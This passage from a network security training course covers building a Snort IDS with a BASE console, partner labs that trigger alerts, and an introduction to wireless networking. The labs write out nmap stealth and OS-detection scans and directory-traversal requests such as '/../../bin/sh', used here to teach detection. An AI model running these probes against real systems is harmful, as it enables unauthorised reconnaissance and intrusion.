$alert_port = '';
$alert_user = 'snort';
$alert_password = 'snortpass';
6. Save and close the base_conf.php file.
7. Restart your server.
Configuring BASE
You have just about finished with the steps to getting your system operational. There is one last configuration that is required once the BASE console is running. In this last task, you will need to tell BASE how to set up the database. Once this last step is complete, your system will be ready to go.
TASK 8E-8
Configuring BASE
1. Open a web browser.
2. In the address bar, enter http://localhost/base/base_main.php
3. You will receive a message that the underlying database appears to be
incomplete/invalid.
4. Click the Setup Page link.
5. On the next page, click the Create BASE AG button on the right side of
the page. If you get a Security Warning, click Continue.
6. The required items will be successfully created. Click the Main Page link
at the bottom of the page.
7. You are now at the default page of your new BASE console.
This next task is not a requirement specific to the BASE console, but it is required for remote access to your web server. Later in this lesson, you are going to generate some events through the web server. In order for a simulated attacker to be able to connect to your web server, it must be enabled for others to access. By default, the firewall in your installation does not allow this. In the following task, you will turn on the HTTP service through the firewall.
TASK 8E-9
Configuring the Firewall to Allow HTTP
1. From the Computer menu, choose YaST.
2. Click Security And Users, and then click Firewall.
3. On the left side, click Allowed Services.
4. From the Service To Allow drop-down list, select HTTP Server.
5. Click the Add button to the right of the drop-down list.
6. Click Next, and then click Accept.
7. Close YaST.
Generating Snort Events
At this time, you have configured Snort, MySQL, PHP, Apache, ADOdb, and BASE. However, you likely had no data in your BASE console when you loaded it because there were no events present to cause a trigger. In the following section, you will start Snort, your instructor will generate some simple events, and you will then view this data in your BASE console.
TASK 8E-10
Generating Portscan Snort Events
Setup: This task requires students to work in pairs.
1. Right-click the desktop and open a Terminal.
2. To start Snort, enter snort -d -e -v -c
/etc/snort/snort.conf -l /var/log/snort
3. Keep the Snort window open.
4. Right-click the desktop and open a second Terminal.
5. Verify that your partner has Snort started.
6. In your second Terminal, replacing a.b.c.d with your partner's IP address, enter
nmap -sS a.b.c.d --system-dns
nmap -sX a.b.c.d --system-dns
nmap -sN a.b.c.d --system-dns
nmap -sF a.b.c.d --system-dns
nmap -O a.b.c.d --system-dns
7. When your partner has finished running these nmap scans, close your nmap Terminal, and proceed to the next step.
8. In your Snort Terminal, press Ctrl+Z to stop Snort.
9. Open a web browser, and enter http://localhost/base/base_main.php in
the address bar.
10. Note that you will have new Portscan Traffic found (you may need to scroll
down in your window to see this).
11. Scroll down in your browser, and click the Percentage link to the right
of Portscan Traffic.
12. Here you can see the scans that were detected. Click any of the event IDs
on the left side. These will likely start with #0, or something similar, on
your system.
13. Review the details of this event.
14. Keep your Snort Terminal open, keep the BASE console open, and open
a second web browser for the next task.
In the previous task, you generated simple Portscan traffic, which Snort reported and which you analyzed in your BASE console. In this next task, you will generate web attack traffic. These will be simple URL requests to your web server. You will start Snort in your Terminal window, then open a web browser and make several requests of your partner's server. You will then view the results of these actions in your BASE console.
TASK 8E-11
Generating Web Snort Events
Setup: This task requires students to work in pairs: one student running the Snort IDS, and the other an attacking Windows machine. It is suggested to go through the task twice, with students switching roles the second time through.
1. On the Linux machine running Snort, open your Snort Terminal, and enter snort -d -e -v -c /etc/snort/snort.conf -l /var/log/snort
2. On the Windows Server 2003 machine, verify that your partner has
started Snort.
3. Open a web browser, and connect to http://your.partners.ip.address.
4. Verify that you see the It works! default page. If you do not see this
message, check that the HTTP service is allowed on the web server.
5. In the web browser, enter the following URL requests. Note: These will be unsuccessful, which is fine for this task:
http://your.partners.ip.address/../../
http://your.partners.ip.address/../../bin/sh
Note: Steps 2 through 6 are to be done on the Windows Server 2003 machine.
6. Close the web browser.
7. On the Linux machine running the Snort IDS, switch to your Snort Terminal, and press Ctrl+Z.
8. Open your BASE console.
9. Notice that you now have new alerts; this time they are TCP alerts.
10. Click the percentage next to TCP to analyze the alerts.
11. Answer the following questions:
What is the name of this signature?
(http_inspect) WEBROOT DIRECTORY TRAVERSAL
How can you learn more about this event through BASE?
Click the Snort link next to the name.
What flags were set on this event?
ACK and PSH.
12. Close all open windows.
You have now configured all the components of running a full-fledged Network Intrusion Detection System. The default configuration of Snort uses many different rulesets, which you can define in the snort.conf file. In your environment, you will need to craft rules for your specific requirements or use the predefined rulesets.
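The BASE console you used in the two tasks above groups Snort's alerts by traffic category (Portscan Traffic, TCP, and so on) and by signature name, and the answer to the flags question comes from the TCP flags byte Snort stores with each event. The following Python script is an added example, not part of the course materials: it performs that same grouping over constructed sample alert lines written in Snort's alert_fast layout (the gid:sid values and 192.0.2.x addresses in them are placeholders) and decodes a flags byte such as 0x18 into its flag names.

```python
"""Group Snort alerts the way the BASE console does (by signature and by
traffic category).  Added example, not code from the course: the alert lines
are constructed samples in Snort's alert_fast layout, and the gid:sid values
and addresses in them are placeholders rather than quoted rule identifiers."""
import re
from collections import Counter

# Constructed sample alerts: two portscan-preprocessor events from a SYN scan
# and two http_inspect events from "/../../" style requests.
SAMPLE_ALERTS = """\
03/14-10:21:03.118745  [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} 192.0.2.10 -> 192.0.2.20
03/14-10:21:05.551201  [**] [122:3:0] (portscan) TCP Portsweep [**] [Priority: 3] {PROTO:255} 192.0.2.10 -> 192.0.2.20
03/14-10:24:41.007312  [**] [119:18:1] (http_inspect) WEBROOT DIRECTORY TRAVERSAL [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.0.2.10:3912 -> 192.0.2.20:80
03/14-10:24:52.338860  [**] [119:18:1] (http_inspect) WEBROOT DIRECTORY TRAVERSAL [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.0.2.10:3913 -> 192.0.2.20:80
"""

# One alert_fast line: timestamp, [gid:sid:rev], message, optional
# classification, priority, {protocol}, source -> destination.
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]+)\]\s+)?"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Bits of the TCP flags byte as stored in the Snort database's tcphdr table.
TCP_FLAG_BITS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
                 (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


def parse_alerts(text):
    """Return one dict per well-formed alert line; other lines are skipped."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["priority"] = int(rec.pop("prio"))
        alerts.append(rec)
    return alerts


def category(alert):
    """BASE-style bucket: portscan preprocessor events are listed under
    'Portscan Traffic'; everything else is grouped by its IP protocol."""
    if alert["msg"].startswith("(portscan)"):
        return "Portscan Traffic"
    return alert["proto"]


def summarize(alerts):
    """Counts per signature and per category, plus the percentage column
    that BASE shows next to each category."""
    by_signature = Counter(a["msg"] for a in alerts)
    by_category = Counter(category(a) for a in alerts)
    total = sum(by_category.values())
    percent = ({c: round(100.0 * n / total, 2) for c, n in by_category.items()}
               if total else {})
    return {"by_signature": by_signature, "by_category": by_category,
            "percent": percent}


def decode_tcp_flags(flags_byte):
    """Names of the flags set in a TCP flags byte, e.g. 0x18 -> PSH and ACK."""
    return [name for bit, name in TCP_FLAG_BITS if flags_byte & bit]


if __name__ == "__main__":
    report = summarize(parse_alerts(SAMPLE_ALERTS))
    for cat, n in report["by_category"].items():
        print(f"{cat:18} {n:3d}  {report['percent'][cat]:6.2f}%")
    for sig, n in report["by_signature"].items():
        print(f"  {n:3d}  {sig}")
    print("flags 0x18 =", " and ".join(decode_tcp_flags(0x18)))
```

To run it against a real Snort deployment, feed the contents of the alert file written under the -l log directory to parse_alerts() instead of SAMPLE_ALERTS.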
Summary
In this lesson, you identified that there are many different types of IDSes, and you implemented the world's favorite free IDS, Snort. You used Snort as a network-based IDS tool that is designed to monitor TCP/IP networks, looking for suspicious traffic and direct network attacks. You learned that Snort enables system administrators to collect enough data to make informed decisions on the best course of action when an intrusion is detected. You then built a fully functional network IDS on Linux, including the BASE console for alert analysis.
Instructor note: Steps 7 through 12 are to be done on the Linux IDS machine.
Instructor note: If you have time, have your students turn on Snort again, and then you can generate some events (scanning, web events, etc.). Ask your students to identify what you did by analyzing their BASE consoles.
Lesson Review
8A What protocols does Snort support?
TCP, UDP, IP, and ICMP.
What are the four primary parts of the Snort.conf file?
Variables, preprocessors, output plug-ins, and rulesets
8B What must be installed in Windows prior to installing snort?
LibPcap for Windows (also known as WinPcap).
8C How do you negate an option in Snort?
By using the exclamation point (!) symbol.
8D What Snort file must you edit in order to have Snort connect to a database?
Snort.conf
At the mysql prompt, what is the command to make a new database,
called snortdb1?
create database snortdb1;
8E What scripting does Apache need to have configured in order for your BASE console to work?
PHP
What are the components of a LAMP server?
Linux, Apache, MySQL, and PHP
Securing Wireless Networks
Overview
In this lesson, you will learn to implement and secure a wireless network. You will examine the components of the network, and how to configure these components. You will detail the security options required for making wireless networks part of your trusted enterprise. You will perform wireless network analysis using leading wireless tools, and examine how to create a trusted wireless network.
Objectives
To secure a wireless network, you will:
9A Examine the fundamental issues of wireless networking.
You will identify and examine the equipment, media, and systems of
wireless networking.
9B Describe the fundamentals of wireless local area networks.
You will describe how WLANs function, including the 802.11 framing
options, the essentials of WLAN congurations, and the threats that exist
to the WLAN.
9C Implement wireless security solutions.
You will implement WEP, SSID broadcast disabling, MAC address filtering, and WPA as security solutions to the wireless network.
9D Audit the wireless network.
You will use leading tools, such as OmniPeek Personal and NetStumbler,
to audit a wireless network.
9E Describe the implementation of a wireless trusted network, a wireless
PKI.
You will examine the components required to implement and the procedure for implementing a wireless trusted network.
Data Files: dotnetfx.exe, NetStumblerInstaller_0_4_0
Lesson Time: 8 hours
LESSON 9
Lesson 9: Securing Wireless Networks 447
Topic 9A
Wireless Networking Fundamentals
Not too long ago, the concept of a network inside an office that had no wires running to and from the client computers seemed a bit far-fetched. Perhaps in the future, many people said, but not for a while. Fast forward only a few short years, and you are in the future. Wireless networks are here now.
The idea now of a mobile workforce, able to move through an office, city, or
country, and connect no matter where they are located has become very desirable
to many organizations. The enterprise network now must include options for users
to move, and have their connection stay with them.
In addition to the idea of a mobile workforce, other factors are pushing the implementation of wireless networks. New networks can be deployed faster, and often cheaper, if they are wireless versus wired. Buildings where running cable is cost prohibitive, such as offices across a street or city block, are finding wireless the best option. Companies that have chosen architectural buildings for their appearance may find those buildings marked as historical landmarks, and running cables may not be allowed. All of these reasons will make the option of a network without wires seem like the perfect solution.
But what may seem like a perfect solution has serious issues upon closer
inspection. Even though the network experience may seem the same to end users,
there are major differences in wireless networks from their wired counterparts.
Where two computers communicating in a wired network have a single cable
connecting each end point, there is no such cable for the wireless network.
It is this lack of cable that causes the problems. For most enterprises, not much
of the security policy and effort will be spent on the physical medium. There may
be systems in place to try to prevent cable splicing, or physical security systems
that guard the cable. The wireless network cannot employ these systems.
Wireless Equipment
As you may expect, there are unique pieces of equipment used to run the wireless network. Although many of these pieces perform tasks similar to their wired counterparts, the wireless network equipment requires specific examination. The physical pieces used in the wireless network require careful placement because the location of the devices can affect security and performance of the network.
Access Points
The centerpiece, literally, of the wireless network is the Wireless Access Point.
The full acronym for this is WAP, but in the context of this lesson, the acronym
AP (for access point) will be used. This is to eliminate confusion with the other
wireless networking acronym of the same name, which is Wireless Application
Protocol.
The function of the AP in the wireless network is similar to that of the switch in
the wired network. Individual components of the network communicate to and
from the AP in order to communicate with other network components. Each AP
will have at least one, and usually two antennas. By having multiple antennas, the
AP is able to cancel out any duplicating radio waves that may reach the AP.
Figure 9-1: Linksys Wireless Access Point, model: WAP54G.
Wireless Network Cards (WNIC)
Just as a network card is required to connect to the cable in the wired network, a network card is required to connect to the wireless network media. These cards can be installed in desktop or laptop computers, or even embedded into appliances. The majority of newer laptop computers have built-in wireless network capability options as well.
Figure 9-2: Netgear wireless network card.
Antennas
Whereas the AP of the wireless network is similar to the switch in the wired network, and the network cards of both the wireless and wired networks have the same functionality, there is one component of the wireless network that is not found in the wired networks. This component is the antenna.
The antenna itself becomes an extension of the transmitter or receiver. When an
access point transmits a signal it is passed from the internal signal generation
components to the antenna, then transmitted through the air to a receiving
antenna, which pulls the signal into the device.
An antenna can be designed, through its construction and aiming, to increase its ability to pull in a good signal. This increase is called the gain of the antenna. Although there are many subtypes of antennas, there are three common types of antennas used to increase the range of wireless networks. These are the yagi, parabolic, and omni-directional antennas.
The yagi antenna is one that is designed to be very directional. Yagi antennas
may be enclosed in a tube, as shown in Figure 9-3, or they may be open, like the
traditional over-the-air television antennas. Yagi antennas are perfect for direct
point-to-point communication, such as a bridge connecting two offices.
Figure 9-3: A yagi antenna, manufactured by Telex Wireless.
The second common antenna is the parabolic antenna. This antenna is also a
good choice for bridging two networks, and has a greater range than the yagi
antenna. The parabolic dish antenna is able to create gains that can be twice that
of the yagi antenna.
Figure 9-4: A parabolic dish antenna, manufactured by Telex Wireless.
The third common antenna is the omni-directional antenna. The omni-directional
antenna is often used in conjunction with an AP to increase the local connection
ability of the wireless network. This antenna type is usually mounted high above
the group of end points that will communicate with the wireless network. The
gain of the omni-directional antenna can approach that of some yagi antennas, but
is quite a bit less than the gains of the parabolic antennas.
Figure 9-5: An omni-directional antenna, manufactured by Telex Wireless.
Association
A unique aspect of the wireless network is that nodes that are going to use an
access point must rst associate with an access point. In the wired network, the
node is simply turned on and plugged into the cable, there is no association
required for the local hub or switch. In the wireless network, the node must be
turned on, and then associate, or join, a wireless access point.
This process of association is accomplished by the wireless node knowing what its alphanumeric identifier is, and looking for an alphanumeric identifier that matches. The vast majority of network cards now include an option that scans the local radio waves and lists the possible networks that the WNIC can attempt to associate with. The scan is only the first step toward association; the WNIC must also be authenticated, and only then can association succeed.
Wireless Media
In the traditional network, the cable can be guarded and cable runs carefully controlled; in the wireless network there is no cable. This presents the problem of wireless security in a very general way. The problem is how to secure that which you cannot see, and cannot control.
Although the media cannot be seen, there are similarities between the wired and
wireless networks. In both networks, a signal is sent from one computer to
another computer, there must be a common method of communication, and there
must be a common method of delivery and receipt.
In the wireless network, the media used to carry the signals from one wireless device to another can vary. In this course, you will examine the three wireless media: infrared, microwave, and radio waves. There are significant differences in these media, in how they work, and what they can do for your network.
Figure 9-6: The electromagnetic spectrum.
Infrared Wireless Media
Infrared wireless technology has been around for many years. The most common example of infrared technology is in electronic remote controls. The signals used for infrared communication are in the terahertz range, and this allows for solid communication. The infrared signal is pure light, usually electromagnetic waves or photons from a small section of the electromagnetic spectrum.
Infrared is a simple wireless technology that uses pulses of light. If a binary one is required, the light is on; if a binary zero is required, the light is off. An emitter on one device (normally an LED) sends the light and a detector receives the light signal and reproduces the correct signal (either the one or the zero). The two common methods of wireless infrared communication are line-of-sight and diffused (also called broadcast).
Line-of-sight (sometimes called point-to-point) requires the emitter and detector to be directly in line with each other. If any object passes between the two points, no matter how brief, the line-of-sight is broken and the transmission will be interrupted. Due to this, any networking service that requires high degrees of reliability will likely not use this implementation.
Infrared is most often used today to network devices such as digital cameras,
scanners, PDAs, and other devices to computers. These types of devices can be
held in close proximity to one another so the odds of an object getting between
the emitter and detector are very low.
From a security perspective, infrared line-of-sight is an acceptable choice. This is
because the single beam between the two end points must be constant. There is
no sniffing option, as the light beam is direct and focused. It is possible to split
the beam, but that would require physical access to the beam between the two
end points.
The beam splitter is often a prism, normally designed as a right-angle triangle, with a mirror on a 45-degree surface. The beam goes through the prism, and reflects a small amount of the signal to a third point. This third point can then put the signal back together. Note, the splitter must be physically placed in the beam, so any enterprise with adequate physical security should prevent this type of sniffing.
Figure 9-7: A beam splitter.
Although the prism is the most common form of a beam splitter, there are also
beam splitters that are simple mirrors with a high degree of translucency. The
mirror is placed at an angle in the stream, and functions just as the prism does.
Just as the line-of-sight beam cannot be sniffed, the infrared signal cannot penetrate walls; therefore, the infrared transmission cannot be listened in on from a neighboring room or outside office. Another strong point for infrared line-of-sight is that outside interference is minimal; other radio waves will have no noticeable effect on the signal.
The security advantages of infrared wireless are offset by the limitations of infrared. Infrared cannot provide any mobility to the devices, and the pure line-of-sight issue causes too much disruption in most office settings.
A close relative of local line-of-sight infrared networking is laser communication. Laser communications work by using a powerful directed beam between two points, with the unique difference being that the distances covered are much greater. Laser line-of-sight transmissions can cover miles, as long as the direct and uninterrupted line-of-sight is clear and available.
Diffused infrared technologies overcome some of the limitations of line-of-sight communication. In the broadcast network, there still are two end points, the emitter and detector. However, the emitter does not send the signal directly to the detector. Instead, the signal is sent out to the network, and can bounce off walls and other objects in the room. The detector receives the signal and processes the information just as if it were line-of-sight.
A big difference between line-of-sight and diffused infrared is speed. Because the
signal has to travel farther and bounce off surfaces, it is a weaker signal when the
receiving node detects the transmission. A second difference is that because the
signal is broadcast, end points other than the intended recipient are able to
receive the transmission.
These issues combine to limit most use of infrared in wireless networking to the
small local devices. As more and more people use small devices, you can expect
infrared technology to remain a part of wireless networking for some time.
Microwave Wireless Media
Whereas infrared wireless networking serves individual devices, such as PDA communication to a PC, it is usually not used to build the network infrastructure. One of the technologies that is used for this purpose is microwave technology.
Microwave wireless networks allow for two end points to be placed far apart from one another. The connection is still made between two end points, one sending and one receiving node. There are two main types of microwave systems used in wireless networking: terrestrial and satellite.
Terrestrial microwave systems usually use a directional antenna to send and receive network transmissions directly from one to another. These systems are designed to be direct line-of-sight, although they can use relay towers to extend the range or to move the signal around obstacles. Weather can have an effect on these signals, although not to the degree the weather has on infrared.
Depending on the laws in your area, you may need to get a license to operate a
microwave transmitter. There are usually strengths and frequencies that do not
require licensing. Even though it may not be required, you may wish to pursue
licensing so you can protect the frequency for that area, and prevent others from
using the same frequency.
Satellite Microwave
When you have extreme distance to cover, the only choice is satellite. Satellites
are the equivalent of the transmitter and receiver stationed high in the sky. By
placing the transmitter and receiver higher, more ground can be covered by the
same point. This allows an enterprise with one office in New York to have a
single hop to a second office in London.
Figure 9-8: Example of satellite microwave networking.
There are multiple orbits a satellite might take around the Earth. Geostationary orbits (GEOs) are those that circle Earth directly above the equator. A benefit of gravity and orbiting is that once at a specific point, the geostationary satellite will achieve a fixed position. This position is approximately 22,200 miles (or 36,000 km) above the Earth's surface. Being placed at such an altitude, the satellite will be able to cover about one-third of the Earth's surface. You could, therefore, place three satellites 120 degrees apart and cover the entire planet, except for the extreme northern and southern latitudes. Today there are hundreds of GEOs in the sky above you.
There is also an orbital pattern called the Highly Elliptical Orbit (HEO). These orbits do not circle the Earth around the equator. Instead, these satellites orbit in an oval-shaped pattern. The oval is not centered on the Earth; instead, the satellite will pass close to the Earth (its closest point is called the perigee of the orbit), and will then move further away from Earth (its furthest point is called the apogee of the orbit).
Finally, there are Low Earth Orbits (LEOs). These orbits are between 124 and 15,900 miles above the Earth's surface (between 200 and 25,589 km). Most of the satellites in this range are at the low end, from 124 to 1,490 miles (200 to 2,400 km). These satellites can move very fast, and can be visible with the naked eye standing on Earth. A satellite in LEO may be able to circle the entire Earth in 90 minutes. LEOs are not restricted to equatorial orbits.
TASK 9A-1
Examining Satellite Orbits
1. Open Internet Explorer, and connect to http://science.nasa.gov/Realtime/JTrack/3D/JTrack3D.html
2. In the dialog box asking you to perform an install, click No. Wait for a
moment, the JTrack satellite applet will open and load satellite data.
3. Maximize the applet.
4. Once the applet loads, press Ctrl and click the mouse (Ctrl-click) to
move the Earth back and to see the orbital path of the GEOs. Examine the
distance to the GEO orbits in relation to the size of the Earth.
5. Click any small white dot to see the orbital path of the satellite.
6. Click the mouse in the applet and drag to rotate the Earth and notice the
GEOs all are lined in a similar pattern.
7. Ctrl-click until the Earth is small in the applet.
8. Click a white dot that seems further away from Earth, and not in the
same circle pattern of the GEOs.
9. Try to find Chandra, AO-40, and Integral. Examine the orbital patterns of these HEO satellites.
10. Shift-click to move in towards Earth until the continents are clearly
visible.
11. Click any white dot that is near Earth, and examine the orbital patterns
of these LEO satellites.
12. Shift-click until the Earth fills the applet window.
13. Choose Options→Update Rate→1/4 Second.
14. Choose Options→Timing→Real-time.
15. Note the movement of the satellites in LEO.
16. Choose Options→Timing→X100.
17. Note the movements of the LEO satellites at 100 times real-time speed.
18. When you have finished examining the orbital patterns of the satellites, close the JTrack3D applet and close Internet Explorer.
19. What type of satellite orbit, the LEO or the GEO, will introduce the
largest delay in packet transmission?
The GEOs produce the highest delay in packet transmission. You may be
able to get high speeds, but the distance alone dictates that there will be
considerable delay in the network packet transmission.
Radio Wireless Media
Although infrared and satellite communications have their place in the wireless world, the emphasis today with regard to security is on radio waves. This is because the vast majority of wireless network communications take place on radio waves. Although people often think of the analogy of water waves, this is not quite accurate. Radio waves do not require a physical surface, as the water wave does. Rather, the radio waves ride on an electromagnetic (EM) wave, referred to as the EM field. Waves in the electromagnetic spectrum move at the speed of light, or 186,000 miles per second. There is a similarity with the water wave in dissipation, however.
If you throw a rock into water, a wave starts in a circular pattern and radiates out from where the rock entered the water. The circular waves get smaller, or dissipate, as they get farther away from the source. Radio waves are similar. They are broadcast from a source, and radiate out away from the source. The farther away from the source, the weaker the signal becomes, until it cannot be located.
In the water, waves reect off of surfaces, and can even bounce back onto
another wave. This can happen with radio waves as well. If two waves collide at
the right time, with both waves at their peak, the end result is that the waves are
added (called in phase), resulting in a bigger wave. If two waves collide at the
right time, with one wave at a peak and one wave at a trough (called out of
phase), the end result is that the waves cancel each other out.
Reflecting waves can cause problems for wireless networks; therefore, the device manufacturers have addressed this issue. One problem is that a signal can be broadcast and, due to bouncing off surfaces, will reach the access point multiple times and at different times. These bouncing waves cause interference, and in wireless networking this is called multipath interference. By using multiple antennas on the access point, the access point is able to compensate for the reception of multipath interference.
Another form of interference that wireless networks must deal with is RF interference in the EM field. Devices such as cordless phones and microwave ovens produce signals in the EM field that are used by the wireless network. Devices in the 900 MHz and 2.4 GHz ranges are in the Industry, Science, & Medical (ISM) band, while devices in the 5 GHz range are in the Unregulated National Information Infrastructure (U-NII) band. The technology used to minimize the effect of these other devices is called spread spectrum technology.
Spread Spectrum
Spread spectrum technology allows for bandwidth to be shared by multiple devices, so your microwave and wireless network are not going to battle over the exact same frequency at the exact same time. Spread spectrum works by splitting the information over multiple channels of communication. By splitting the information over different channels, if a person is sniffing one specific channel, they will not get useful information from that channel, only tiny pieces of larger transmissions. There are two primary methods of spread spectrum used in wireless networks: Frequency Hopping Spread Spectrum (FHSS), and Direct Sequence Spread Spectrum (DSSS).
Frequency Hopping Spread Spectrum (FHSS)
During World War II, the emphasis on secure communications and transmissions was extremely high. Hedy Lamarr and George Antheil came up with the idea of FHSS to keep enemies from jamming radios. The idea was to use a range of frequencies, and to send (or burst) a short amount of information on one frequency, then switch to another frequency, send (burst) some information, then switch frequencies again and send another burst of information, and so on.
Figure 9-9: Multiple signal bursts sent as an example of FHSS.
During FHSS, the time that is spent on any one frequency is called the dwell time, and the amount of time that it takes to move from one frequency to another is called the hop time. A device using FHSS will transmit on the designated frequency and then move to the next frequency using the pre-defined sequence. Once the device reaches the last frequency, the device loops to the first frequency and starts the process over again. The sequence of frequency hopping creates a single channel.
Direct Sequence Spread Spectrum (DSSS)
The DSSS system works differently from FHSS. Instead of hopping from one frequency for a burst, and then another, DSSS transmits on multiple frequencies together. These multiple frequencies are grouped together and called a band. Instead of sending the raw data, DSSS performs an XOR calculation on the data at transmission.
Figure 9-10: The XOR process of DSSS communications.
This added data used in the XOR process is called the chipping code. By adding these codes, the original data is spread out, which increases the likelihood that the data will be received properly. The number of bits (chips) in the chipping code compared to the raw data is referred to as the spread ratio; higher spread ratios mean higher chances of successful communication. The 802.11 specifications dictate that there are to be 11 chipping bits per raw data bit. Due to issues such as the use of multiple frequencies, and the inclusion of the chipping code, DSSS is able to achieve higher rates of transmission than FHSS.
You should not think of either FHSS or DSSS as better than the other. Instead, you should realize that they are used for different functions. FHSS generally costs less to build, is used for devices that require shorter transmission distances, and has a lower overall speed. DSSS generally costs more to build, is used in devices that require greater transmission distances, and offers greater speed. From an administrative viewpoint, you may never deal directly with spread spectrum issues; they are more in the realm of the product manufacturer.
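The XOR step in Figure 9-10 and the 11-chip spread ratio can be worked through in code. The following Python script is an added example, not part of the course: it spreads each data bit with the 11-chip Barker sequence (10110111000, the chipping code 802.11 DSSS uses at 1 and 2 Mbps) and then despreads by majority vote over each group of 11 chips, so a bit still arrives correctly when up to 5 of its 11 chips are corrupted on the air. The message and the corrupted chip positions are constructed for the demonstration.

```python
"""Spread and despread data with an 11-chip code, as DSSS does.  Added
example, not from the course: the chipping code is the 11-chip Barker
sequence used by 802.11 DSSS; the sample message and the corrupted chip
positions are constructed for the demonstration."""

BARKER_11 = [1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0]   # 11 chips per raw data bit


def spread_ratio(code=BARKER_11):
    """Chips per raw data bit; 11 for 802.11 DSSS."""
    return len(code)


def spread(bits, code=BARKER_11):
    """XOR every data bit with the whole chipping code (the XOR step of the
    figure).  A 0 bit goes out as the code itself, a 1 bit as its inverse,
    so the output is len(code) times longer than the input."""
    return [b ^ c for b in bits for c in code]


def despread(chips, code=BARKER_11):
    """Recover each data bit by undoing the XOR chip by chip and taking a
    majority vote over the group.  The bit survives as long as fewer than
    half of its chips were corrupted in transit."""
    n = len(code)
    if len(chips) % n:
        raise ValueError("chip stream is not a whole number of symbols")
    bits = []
    for i in range(0, len(chips), n):
        votes = sum(ch ^ c for ch, c in zip(chips[i:i + n], code))
        bits.append(1 if votes * 2 > n else 0)
    return bits


def corrupt(chips, positions):
    """Flip the chips at the given positions (constructed channel noise)."""
    out = list(chips)
    for p in positions:
        out[p] ^= 1
    return out


def bytes_to_bits(data):
    """Big-endian bit list for a byte string."""
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def bits_to_bytes(bits):
    """Inverse of bytes_to_bits; the bit list must be a multiple of 8."""
    return bytes(int("".join(map(str, bits[i:i + 8])), 2)
                 for i in range(0, len(bits), 8))


def round_trip(message, bad_chips_per_symbol):
    """Spread a message, damage the first bad_chips_per_symbol chips of
    every 11-chip group, and return what the receiver despreads."""
    bits = bytes_to_bits(message)
    chips = spread(bits)
    symbols = len(chips) // spread_ratio()
    damaged = corrupt(chips, [s * spread_ratio() + j
                              for s in range(symbols)
                              for j in range(bad_chips_per_symbol)])
    return bits_to_bytes(despread(damaged))


if __name__ == "__main__":
    # Constructed sample message; five bad chips per symbol still decode,
    # six per symbol defeat the majority vote.
    for bad in (0, 5, 6):
        print(bad, "bad chips per symbol ->", round_trip(b"Hi", bad))
```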
Bluetooth
Although it is the most common technology for wireless networking, 802.11 is not the only wireless standard. Another common standard is Bluetooth. Bluetooth devices are generally FHSS devices, and are used in close proximity to one another.
Bluetooth has found a market in device-to-device communications, such as PDA to computer, computer to printer, automobile to phone headset, and so on. Bluetooth functions in the 2.4 GHz range, and has low-speed bandwidth when compared to 802.11 standards, especially 802.11g. For these reasons, Bluetooth is not designed to be directly competitive with 802.11, but rather a complementary technology used for different purposes.
Short Message Service
As devices continue to become smaller, and as people expect to be able to do
more with their devices, new technologies are required. In wireless networking,
one of these technologies is called the Short Message Service (SMS).
SMS is used to send and receive short (up to 160 characters) text-only messages on devices like cell phones, pagers, and PDAs. This technology uses a store and forward system, which means that if the intended recipient is not available, the message can be stored for later transmission.
Nearly all providers of cellular services offer support for SMS today, and security
problems exist here just as they do with all other forms of wireless
communication. Although SMS security is out of the scope of this course, here
are a few examples of SMS security issues:
A Norwegian company found that a specific message sent via SMS to certain cell phones would freeze the phones, with the only solution being to remove the batteries.
A virus called Timofon.A sends short SMS messages to random numbers. By itself, this is not a true virus, as users have to run a VBS script, but it hints at the potential.
SMS Bombers are being built to flood networks with messages.
IEEE 802.11
All forms of networking that have any success are built upon standards, and wireless networking is no different. The primary standard in the world of wireless networking is the 802.11 standard. The 802 LAN standards committee was created in 1980 by the Institute of Electrical and Electronic Engineers (IEEE), and in 1990 the committee created the 802.11 working group to discuss and define issues surrounding wireless networking.
In 1997, the 802.11 working group finalized their first standard. The IEEE 802.11 standard was to address the Media Access Control (MAC) and Physical (PHY) Layers of network communication. 802.11 described three specific types of transmissions to take place at the PHY Layer:
Diffused Infrared, utilizing infrared transmissions.
Direct Sequence Spread Spectrum (DSSS), utilizing radio transmissions.
Frequency Hopping Spread Spectrum (FHSS), utilizing radio transmissions.
The 802.11 working group quickly found that the project, and the number of issues to discuss, was growing rapidly. The solution to this problem was to create subgroups to handle each issue independently. These groups have been assigned a letter that is appended to the 802.11 name. Several of these groups have produced standards that are used in the industry today, others are on the horizon, and others still will become obsolete.
802.11a
In 1999, IEEE approved the 802.11a standard, calling it: High-speed Physical Layer in the 5 GHz Band. This standard utilizes Coded Orthogonal Frequency Multiplexing (COFM), and supports multiple data transmission rates. Supported rates are: 6, 9, 12, 18, 24, 36, 48, and 54 Mbps. Two 802.11a devices will connect using the fastest data rate (based on things like distance between nodes and signal strength), with a maximum rate of 54 Mbps. Work on this standard is considered complete.
460 Tactical Perimeter Defense
802.11b
Also published in 1999, but slightly ahead of 802.11a, was the IEEE approved 802.11b standard, called: Higher-speed Layer Extensions in the 2.4 GHz Band. This standard utilizes High-Rate Direct Sequence Spread Spectrum (HR-DSS), and supports multiple transmission rates. Supported rates are: 1, 2, 5, and 11 Mbps. Work on this standard is considered complete.
802.11c
The 802.11c working group was developed to manage MAC bridging operations. This type of standard is used by developers of hardware. The 802.11c working group on its own is complete, with continued discussion on this subject folded into the 802.11d working group.
802.11d
